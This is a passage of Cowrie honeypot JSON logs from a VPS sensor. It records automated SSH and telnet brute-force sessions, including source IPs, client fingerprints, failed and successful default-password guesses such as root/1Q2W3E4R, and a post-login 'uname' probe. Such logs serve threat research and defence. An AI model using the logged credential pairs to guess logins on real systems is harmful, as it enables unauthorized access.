0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.395773Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.554645Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:40:41.729398Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.730289Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.796861Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.798299Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.session.closed","duration":12.544694662094116,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:43.923879Z","src_ip":"111.23.24.53","session":"f0a5e5695fc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33772,"dst_ip":"1.2.3.4","dst_port":22,"session":"e91baac82fe4","protocol":"ssh","message":"New connection: 212.227.125.160:33772 (1.2.3.4:22) [session: e91baac82fe4]","sensor":"my-vps","timestamp":"2025-08-26T21:40:46.918535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:46.919719Z","src_ip":"212.227.125.160","session":"e91baac82fe4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:46.969079Z","src_ip":"212.227.125.160","session":"e91baac82fe4"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"ansible","message":"login attempt [ansible/ansible] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:47.120157Z","src_ip":"212.227.125.160","session":"e91baac82fe4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:48.174697Z","src_ip":"212.227.125.160","session":"e91baac82fe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57328,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2ec08c2a0c8","protocol":"ssh","message":"New connection: 212.227.125.160:57328 (1.2.3.4:22) [session: c2ec08c2a0c8]","sensor":"my-vps","timestamp":"2025-08-26T21:40:52.332309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:52.420087Z","src_ip":"212.227.125.160","session":"c2ec08c2a0c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:52.420999Z","src_ip":"212.227.125.160","session":"c2ec08c2a0c8"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"www-data","message":"login attempt [www-data/www-data] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:52.703746Z","src_ip":"212.227.125.160","session":"c2ec08c2a0c8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:53.751649Z","src_ip":"212.227.125.160","session":"c2ec08c2a0c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52776,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f06b1440fe9","protocol":"ssh","message":"New connection: 212.227.125.160:52776 (1.2.3.4:22) [session: 2f06b1440fe9]","sensor":"my-vps","timestamp":"2025-08-26T21:40:57.548916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:57.551169Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:57.596837Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:40:57.781162Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:40:58.513640Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:40:58.514364Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:58.561418Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:58.562634Z","src_ip":"212.227.125.160","session":"2f06b1440fe9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48168,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b80612bce72","protocol":"ssh","message":"New connection: 212.227.125.160:48168 (1.2.3.4:22) [session: 6b80612bce72]","sensor":"my-vps","timestamp":"2025-08-26T21:41:02.956709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:02.966295Z","src_ip":"212.227.125.160","session":"6b80612bce72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:03.022399Z","src_ip":"212.227.125.160","session":"6b80612bce72"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:03.224305Z","src_ip":"212.227.125.160","session":"6b80612bce72"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:04.369041Z","src_ip":"212.227.125.160","session":"6b80612bce72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37264,"dst_ip":"1.2.3.4","dst_port":23,"session":"66f2cf809f5c","protocol":"telnet","message":"New connection: 212.227.125.160:37264 (1.2.3.4:23) [session: 66f2cf809f5c]","sensor":"my-vps","timestamp":"2025-08-26T21:41:04.902518Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45266,"dst_ip":"1.2.3.4","dst_port":22,"session":"745e7f314b99","protocol":"ssh","message":"New connection: 212.227.235.229:45266 (1.2.3.4:22) [session: 745e7f314b99]","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.064425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.065397Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.165702Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+xvyXjpz8OpJU3QWdmFjgeAcL2cEjTBsLENGFLh7BVfwZ+DDxfXObcg7Fn3tnHOVh+W1gY0RARBhDmk1OxbZESaAmDnm4cmpna0xK4YG4MagCpSc/eAB/+Lts24Nt25RD+q2IN9XBq0Bkd74MMPrOR/WcqNz3wWTf5NhhLoixUnaPzxDL8N6rNzU2I0TeR2ZfyyrgE0V1Re+2g93S9xc5UU3UUS4LZfLIb92C6oTjuQQqD9DmaHy9KlApOm4zff0FETZeGfYSPkOQPv4B0lcJWV+l9hPHMCdri3ReVEmdO1BBL4R513pmkfURL5XNIIkMKx4Uy2OVK+M3LTiBOkbFckQLs2h7vgwCH3R+xnmeIqhSP/KPF6cEHd9FSh+qPkew/718DQwLkyNN3/5ekNaGJLQUrrUnc9YDmhtfC+WjYq6mjch5Wh9jl0/bezDCniSKL96qqR/NxAqcOPgV1tos6Xu2VmY+Au4WXDj8D9C670XhcZN3rdUs7Id0jhHtRgU=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.367864Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+xvyXjpz8OpJU3QWdmFjgeAcL2cEjTBsLENGFLh7BVfwZ+DDxfXObcg7Fn3tnHOVh+W1gY0RARBhDmk1OxbZESaAmDnm4cmpna0xK4YG4MagCpSc/eAB/+Lts24Nt25RD+q2IN9XBq0Bkd74MMPrOR/WcqNz3wWTf5NhhLoixUnaPzxDL8N6rNzU2I0TeR2ZfyyrgE0V1Re+2g93S9xc5UU3UUS4LZfLIb92C6oTjuQQqD9DmaHy9KlApOm4zff0FETZeGfYSPkOQPv4B0lcJWV+l9hPHMCdri3ReVEmdO1BBL4R513pmkfURL5XNIIkMKx4Uy2OVK+M3LTiBOkbFckQLs2h7vgwCH3R+xnmeIqhSP/KPF6cEHd9FSh+qPkew/718DQwLkyNN3/5ekNaGJLQUrrUnc9YDmhtfC+WjYq6mjch5Wh9jl0/bezDCniSKL96qqR/NxAqcOPgV1tos6Xu2VmY+Au4WXDj8D9C670XhcZN3rdUs7Id0jhHtRgU=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.368470Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+xvyXjpz8OpJU3QWdmFjgeAcL2cEjTBsLENGFLh7BVfwZ+DDxfXObcg7Fn3tnHOVh+W1gY0RARBhDmk1OxbZESaAmDnm4cmpna0xK4YG4MagCpSc/eAB/+Lts24Nt25RD+q2IN9XBq0Bkd74MMPrOR/WcqNz3wWTf5NhhLoixUnaPzxDL8N6rNzU2I0TeR2ZfyyrgE0V1Re+2g93S9xc5UU3UUS4LZfLIb92C6oTjuQQqD9DmaHy9KlApOm4zff0FETZeGfYSPkOQPv4B0lcJWV+l9hPHMCdri3ReVEmdO1BBL4R513pmkfURL5XNIIkMKx4Uy2OVK+M3LTiBOkbFckQLs2h7vgwCH3R+xnmeIqhSP/KPF6cEHd9FSh+qPkew/718DQwLkyNN3/5ekNaGJLQUrrUnc9YDmhtfC+WjYq6mjch5Wh9jl0/bezDCniSKL96qqR/NxAqcOPgV1tos6Xu2VmY+Au4WXDj8D9C670XhcZN3rdUs7Id0jhHtRgU=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.469502Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"8d:9e:54:20:5e:30:48:b8:50:ac:53:76:b9:19:13:9e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+xvyXjpz8OpJU3QWdmFjgeAcL2cEjTBsLENGFLh7BVfwZ+DDxfXObcg7Fn3tnHOVh+W1gY0RARBhDmk1OxbZESaAmDnm4cmpna0xK4YG4MagCpSc/eAB/+Lts24Nt25RD+q2IN9XBq0Bkd74MMPrOR/WcqNz3wWTf5NhhLoixUnaPzxDL8N6rNzU2I0TeR2ZfyyrgE0V1Re+2g93S9xc5UU3UUS4LZfLIb92C6oTjuQQqD9DmaHy9KlApOm4zff0FETZeGfYSPkOQPv4B0lcJWV+l9hPHMCdri3ReVEmdO1BBL4R513pmkfURL5XNIIkMKx4Uy2OVK+M3LTiBOkbFckQLs2h7vgwCH3R+xnmeIqhSP/KPF6cEHd9FSh+qPkew/718DQwLkyNN3/5ekNaGJLQUrrUnc9YDmhtfC+WjYq6mjch5Wh9jl0/bezDCniSKL96qqR/NxAqcOPgV1tos6Xu2VmY+Au4WXDj8D9C670XhcZN3rdUs7Id0jhHtRgU=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.470438Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43554,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b2e3b462cba","protocol":"ssh","message":"New connection: 212.227.125.160:43554 (1.2.3.4:22) [session: 0b2e3b462cba]","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.711663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.723355Z","src_ip":"212.227.125.160","session":"0b2e3b462cba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:08.774611Z","src_ip":"212.227.125.160","session":"0b2e3b462cba"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"dmdba","message":"login attempt [dmdba/dmdba] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:09.020319Z","src_ip":"212.227.125.160","session":"0b2e3b462cba"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:10.269144Z","src_ip":"212.227.125.160","session":"0b2e3b462cba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38944,"dst_ip":"1.2.3.4","dst_port":22,"session":"db02f4757b90","protocol":"ssh","message":"New connection: 212.227.125.160:38944 (1.2.3.4:22) [session: db02f4757b90]","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.297854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.299082Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.349983Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
